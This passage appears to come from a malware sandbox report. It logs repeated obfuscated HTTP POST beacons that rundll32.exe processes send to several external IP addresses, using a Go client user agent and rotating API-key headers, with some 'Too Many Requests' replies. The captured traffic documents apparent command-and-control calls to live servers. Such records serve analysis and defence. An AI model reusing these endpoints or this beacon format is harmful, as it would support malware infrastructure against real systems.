    Jul 15, 2024 12:50:59.785394907 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: Kg6JyYbW
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    7 | 192.168.2.5 | 49714 | 77.238.229.63 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:01.167155981 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: z2Xzv1Cn
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    8 | 192.168.2.5 | 49715 | 77.238.250.123 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:01.896954060 CEST | 296 | OUT | POST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: Kfz6N6A8
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:51:02.290771008 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:51:02 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    9 | 192.168.2.5 | 49716 | 77.238.250.123 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:02.844525099 CEST | 296 | OUT | POST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: nj2YfkTv
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:51:03.391365051 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:51:03 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    10 | 192.168.2.5 | 49717 | 195.2.70.38 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:03.965400934 CEST | 293 | OUT | POST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: uhN0gLUg
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    11 | 192.168.2.5 | 49718 | 91.142.74.28 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:05.709209919 CEST | 294 | OUT | POST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: o7SaWr3Y
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    12 | 192.168.2.5 | 49722 | 77.238.224.56 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:07.453811884 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: UhHxW3e1
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    13 | 192.168.2.5 | 49725 | 77.238.229.63 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:09.083657026 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: S2xgNF8m
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    14 | 192.168.2.5 | 49727 | 77.238.250.123 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:10.705878973 CEST | 296 | OUT | POST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: sVuhwGs3
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:51:11.313143015 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:51:11 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    15 | 192.168.2.5 | 49728 | 195.2.70.38 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:32.497910023 CEST | 293 | OUT | POST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: sIfHrafn
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    16 | 192.168.2.5 | 49729 | 195.2.70.38 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:33.587869883 CEST | 293 | OUT | POST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: Nf3wk7U4
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    17 | 192.168.2.5 | 49730 | 91.142.74.28 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:34.255948067 CEST | 294 | OUT | POST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: ATDhLw6w
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    18 | 192.168.2.5 | 49731 | 91.142.74.28 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:35.293457985 CEST | 294 | OUT | POST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: Zkenh3CY
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    19 | 192.168.2.5 | 49732 | 77.238.224.56 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:36.043051958 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: HgbkLws5
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    20 | 192.168.2.5 | 49733 | 77.238.224.56 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:37.048932076 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: I1t5Miuh
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    21 | 192.168.2.5 | 49734 | 77.238.229.63 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:37.628230095 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: pFsqKT3N
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    22 | 192.168.2.5 | 49735 | 77.238.229.63 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:38.674495935 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: f6xiHrqv
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    23 | 192.168.2.5 | 49736 | 77.238.250.123 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:39.253839016 CEST | 296 | OUT | POST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: xA06voUp
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:51:39.871294022 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:51:39 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    24 | 192.168.2.5 | 49737 | 77.238.250.123 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:40.328762054 CEST | 296 | OUT | POST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: CCU8DIdm
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:51:40.939387083 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:51:40 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    25 | 192.168.2.5 | 49738 | 195.2.70.38 | 80 | 6516 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:51:41.322577953 CEST | 293 | OUT | POST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: zqG2mfyC
    Accept-Encoding: gzip
